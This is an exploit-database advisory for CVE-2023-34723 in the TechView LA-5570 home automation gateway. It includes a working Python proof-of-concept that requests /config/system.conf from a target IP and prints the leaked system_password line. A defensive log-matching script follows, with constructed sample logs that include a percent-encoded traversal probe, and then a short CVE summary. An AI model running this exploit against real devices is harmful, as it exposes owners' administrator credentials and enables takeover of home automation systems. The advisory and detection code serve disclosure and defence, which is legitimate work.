TECHView LA5570 Wireless Gateway 1.0.19_T53 Traversal / Privilege Escalation

TECHView LA5570 Wireless Gateway version 1.0.19_T53 suffers from directory traversal, privilege escalation, and information disclosure vulnerabilities.

Packet Storm
# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities
# Google Dork: N/A
# Date: 25/08/2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570
# Software Link: N/A
# Version: 1.0.19_T53
# Tested on: MACOS/Linux
# CVE : CVE-2023-34723
# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725

#!/opt/homebrew/bin/python3

import requests
import sys
from time import sleep
from urllib3.exceptions import InsecureRequestWarning
from colorama import init
from colorama import Fore, Back, Style
import re
import os
import ipaddress

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def banner():
    if os.name == 'posix':
        clr_cmd = ('clear')
    elif os.name == 'nt':
        clr_cmd = ('cls')
    os.system(clr_cmd)
    print ("[+]****************************************************[+]")
    print (" | Author      : The Security Team                      |")
    print (" | Company     : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")
    print (" | Description : TechVIEW LA-5570 Directory Traversal   |")
    print (" | Usage       : "+sys.argv[0]+" <target>              |")
    print ("[+]****************************************************[+]")

def usage():
    print (f"Usage: {sys.argv[0]} <target>")

def main(target):
    domain = "http://"+target+"/config/system.conf"
    try:
        url = domain.strip()
        r = requests.get(url, verify=False, timeout=3)
        print ("[+] Retrieving credentials", flush=True, end='')
        sleep(1)
        print(" .", flush=True, end='')
        sleep(1)
        print(" .", flush=True, end='')
        sleep(1)
        print(" .", flush=True, end='')
        if ("system_password" in r.text):
            data =  (r.text.split("\n"))
            print (f"\n{data[1]}")
        else:
            print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)
    except TimeoutError:
        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
    except KeyboardInterrupt:
        return
    except requests.exceptions.Timeout:
        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
        return

if __name__ == '__main__':
    if len(sys.argv)>1:
        banner()
        target = sys.argv[1]
        try:
            validate = ipaddress.ip_address(target)
            if (validate):
                main (target)
        except ValueError as e:
            print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)
    else:
        print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)
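
For defenders, the request made by the PoC above is easy to spot in HTTP logs. The following is an added detection example, not code from the original advisory or its author. It assumes a reverse proxy or gateway in front of the device writes Common Log Format lines; the function names and sample lines are constructed for illustration.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Path requested by the PoC; on affected firmware the response holds system_password.
SENSITIVE_PATH = "/config/system.conf"

# Common Log Format, as a proxy in front of the gateway might write it
# (assumption: the advisory does not describe the device's own logging).
CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def canonical_path(target):
    """Drop the query, undo nested percent-encoding, collapse ./ ../ and //."""
    path = target.split("?", 1)[0]
    for _ in range(3):  # bounded loop so double-encoded paths are still decoded
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return normpath("/" + path.replace("\\", "/").lstrip("/"))

def find_hits(lines):
    """Return (source, raw_target, status, served) per request resolving to SENSITIVE_PATH."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # unparseable line, nothing to classify
        if canonical_path(m["target"]) == SENSITIVE_PATH:
            status = int(m["status"])
            hits.append((m["src"], m["target"], status, status == 200))
    return hits

# Constructed sample log lines (documentation address ranges), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Aug/2023:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [25/Aug/2023:10:00:05 +0000] "GET /config/system.conf HTTP/1.1" 200 311',
    '198.51.100.7 - - [25/Aug/2023:10:00:06 +0000] "GET /img/..%2fconfig/system.conf HTTP/1.1" 404 0',
    '203.0.113.5 - - [25/Aug/2023:10:02:11 +0000] "GET /config/system.conf?x=1 HTTP/1.1" 403 0',
    '192.0.2.10 - - [25/Aug/2023:10:03:00 +0000] "GET /configs/system.conf.bak HTTP/1.1" 404 0',
    'truncated line without a request field',
]

if __name__ == "__main__":
    for src, target, status, served in find_hits(SAMPLE_LOG):
        verdict = "FILE SERVED, treat the password as exposed" if served else "probe"
        print(f"{src} {status} {target} -> {verdict}")
```

A hit with status 200 means the configuration file was returned to the requester; other status codes indicate the request was made but not answered with the file.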

Related news

CVE-2023-34723: Wireless Gateway Home Automation Controller

An issue in TechView LA-5570 Wireless Gateway 1.0.19_T53 allows attackers to gain sensitive information via /config/system.conf.
